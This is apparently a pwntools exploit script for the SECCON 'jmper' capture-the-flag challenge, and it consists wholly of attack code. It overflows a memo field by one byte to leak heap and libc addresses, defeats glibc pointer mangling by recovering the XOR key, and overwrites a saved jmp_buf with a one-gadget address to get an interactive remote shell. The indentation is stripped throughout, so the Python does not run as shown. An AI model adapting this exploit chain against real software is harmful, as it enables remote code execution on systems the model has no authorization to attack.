from pwn import *
elf = "/root/pwn/seccon/jmper"
lib64 = "/root/pwn/seccon/libc-2.19.so-8674307c6c294e2f710def8c57925a50e60ee69e"
#lib64 = "/lib/x86_64-linux-gnu/libc-2.21.so"
#s = process(elf)
s = remote('jmper.pwn.seccon.jp',5656)
e = ELF(elf)
l = ELF(lib64)
print s.recvuntil("Bye :)")
DEBUG = 1
if DEBUG == 2:
context.log_level = 'debug'
def ROR(data, shift, size=64):
shift %= size
body = data >> shift
remains = (data << (size - shift)) - (body << size)
return (body + remains)
def ROL(data, shift, size=64):
shift %= size
remains = data >> (size - shift)
body = (data << shift) - (remains << size )
return (body + remains)
def add():
s.sendline("1")
print s.recvuntil("Bye :)")
def name(id,t):
s.sendline("2")
print s.recv()
s.sendline(str(id))
print s.recv()
s.send(t)
print s.recvuntil("Bye :)")
def memo(id,t):
s.sendline("3")
print s.recv()
s.sendline(str(id))
print s.recv()
s.send(t)
print s.recvuntil("Bye :)")
def v_name(id):
s.sendline("4")
print s.recv()
s.sendline(str(id))
print s.recvuntil("ID:")
return s.recv()
def v_memo(id):
s.sendline("5")
print s.recv()
s.sendline(str(id))
return s.recvuntil("1.")[:-2]
add()
memo(0,"A"*0x1f+"B\n")
leak_heap = v_memo(0).split("B")[1]
leak_heap += "\x00"*(8-len(leak_heap))
leak_heap = u64(leak_heap)
print "[*] LEAK HEAP : %x" % leak_heap
if leak_heap&0xff < 0x20:
print "FAIL"
exit()
memo( 0, "A"*0x20 + chr( (leak_heap&0xff) - 0x18 ) )
name( 0,p64(e.got['printf'])+"\n")
leak_libc = u64(v_name(0)[:6]+"\x00\x00")
print "[*] LIBC LEAK : %x" % leak_libc
add()
memo(1,"A"*0x1f+"B\n")
leak_heap = v_memo(1).split("B")[1]
leak_heap += "\x00"*(8-len(leak_heap))
leak_heap = u64(leak_heap)
print "[*] LEAK HEAP : %x" % leak_heap
if leak_heap&0xff < 0x20:
print "FAIL"
exit()
memo( 1, "A"*0x20 + chr( (leak_heap&0xff) - 0x18 ) )
jmper = leak_heap-0x180
ret = jmper+0x30
ori_ret = 0x00400C31
add()
# print "PID : %d" % util.proc.pidof(s)[0]
# raw_input()
name( 1, p64(ret)+"\n" )
leak_ret = u64(v_name(1)[8:16])
xorkey = ROR(leak_ret,0x11) ^ ori_ret
oneshot = leak_libc - l.symbols['printf'] + 0x04647C
rreett = ROL(oneshot^xorkey,0x11)
rsp = ROL((leak_heap+0x400)^xorkey,0x11)
print "[*] LEAK JMPER_ADDR : %x" % jmper
print "[*] LEAK RET : %x" % leak_ret
print "[*] XOR KEY : %x" % xorkey
print "[*] change,xor : %x,%x" % (oneshot,rreett)
print (p64(rsp)+p64(rreett)).encode('hex')
add()
name (1,p64(rsp)+p64(rreett)+"\n")
s.send("1\n"*27)
s.interactive()